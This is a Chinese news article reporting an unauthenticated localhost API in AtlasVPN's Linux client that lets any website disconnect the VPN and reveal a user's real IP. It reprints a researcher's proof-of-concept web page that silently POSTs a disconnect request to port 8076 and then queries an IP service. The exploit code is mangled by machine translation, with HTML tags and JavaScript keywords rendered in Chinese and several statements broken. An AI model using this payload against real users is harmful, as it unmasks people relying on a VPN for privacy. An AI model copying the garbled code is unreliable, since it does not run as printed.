日前,国外Reddit网站上出现了有关Linux操作系统 的AtlasVPN客户端发现严重安全漏洞的信息。
一位匿名的网络安全研究人员发布了一个有效的PoC漏洞,并向公众演示了攻击者如何通过在其恶意网站上发布漏洞代码来访问 Linux 版本 VPN 客户端的任何用户的真实IP地址。
根本原因
AtlasVPN Linux 客户端由两部分组成。管理连接的守护进程 (atlasvpnd) 和用户控制连接、断开连接和列出服务的客户端 (atlasvpn)。
客户端不通过本地套接字或任何其他安全方式进行连接,而是在端口 8076 上的本地主机上打开 API。它没有任何身份验证。
计算机上运行的任何程序(包括浏览器)都可以访问此端口。因此,任何网站上的恶意 Java 都可以向该端口发出请求并断开 VPN。如果它随后运行另一个请求,则会将用户的家庭 IP 地址泄漏到使用漏洞代码的任何网站。
漏洞利用代码
以下代码演示了该问题。它可以上传到任何网络服务器。当访问该站点时,AtlasVPN 会断开连接并泄露 IP 地址。不用于非法目的。
<html><头><title>=[ atlasvpnd 1.0.3远程断开连接利用]=</title></头><正文><pre><code id=”log”>=[ atlasvpnd 1.0.3远程断开连接利用 ]=您应该运行 atlasvpn Linux 客户端并连接到 VPN。使用<b>atlasvpn connect</b>连接到VPN服务器。</code></pre><iframe id=”hiddenFrame” name=”hiddenFrame” style=”display: none;”></iframe><form id=”stopForm”action=”http://127.0.0.1:8076/connection/stop”method=”post”target=”hiddenFrame”><button type=”submit”style=”display: none”></button></形式><脚本>window._currentIP = false;//主要运行的漏洞利用代码window.addEventListener(‘加载’, function {添加IPToLog;setTimeout(triggerFormSubmission, 1000);setTimeout(addIPToLog, 3000);});//向 atlasvpnd 发送盲 CORS 请求以断开 VPN函数触发表单提交{var logDiv = document.getElementById(‘log’);logDiv.innerHTML += “[-] 正在向 atlasvpnd 发送中断连接请求…n”;document.getElementById(‘stopForm’).submit;}// 从ipfy API获取IP(当然,这可能是你的服务器)函数 addIPToLog {var logDiv = document.getElementById(‘log’);var xhr = new ;xhr.open(‘GET’, ‘https://api.ipify.org?format=json’, true);xhr. = 函数 {var ipAddress = window._currentIP;if(xhr.status === 200) {var 响应 = JSON.parse(xhr.responseText);ip地址 = 响应.ip;logDiv.innerHTML += ‘[?] 当前IP:’+ ipAddress + “n”;}另外{logDiv.innerHTML += ‘[-]获取IP地址时出错。n’;}//检查IP是否改变。如果是:成功。if(window._currentIP && window._currentIP != ipAddress) {logDiv.innerHTML += “[+] 成功断开VPN。”}if(window._currentIP && window._currentIP == ipAddress) {logDiv.innerHTML += “[-] 断开连接失败,因为您一开始就没有连接到VPN。”}// 保存IP以供下一次迭代使用。window._currentIP = ip地址;};xhr.send;}</> 脚本</正文></html>
“AtlasVPN 并不认真对待用户的安全。他们的软件安全解决方案非常蹩脚,很难相信这是一个错误而不是后门。没有人能如此无能。”一位匿名专家批评该公司的做法。
该专家尝试联系AtlasVPN支持人员报告该漏洞,但没有收到回复。他认为,这表明该公司对客户安全的疏忽态度。
截至本新闻发布时,AtlasVPN 代表尚未对此事发表评论。建议所有 Linux 客户端用户在访问未经验证的站点时务必谨慎,甚至暂时更换 VPN 客户端,直至漏洞得到修复。
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
为了避免权属纠纷,特做如下说明:本站内容作品来自用户分享及互联网,仅供参考,无法核实真实出处,并不代表本网站赞同其观点和对其真实性负责,本网站仅提供信息存储空间服务,我们致力于保护作者版权,如果发现本站有涉嫌侵权的内容,欢迎发送邮件至youxuanhao@qq.com 举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。
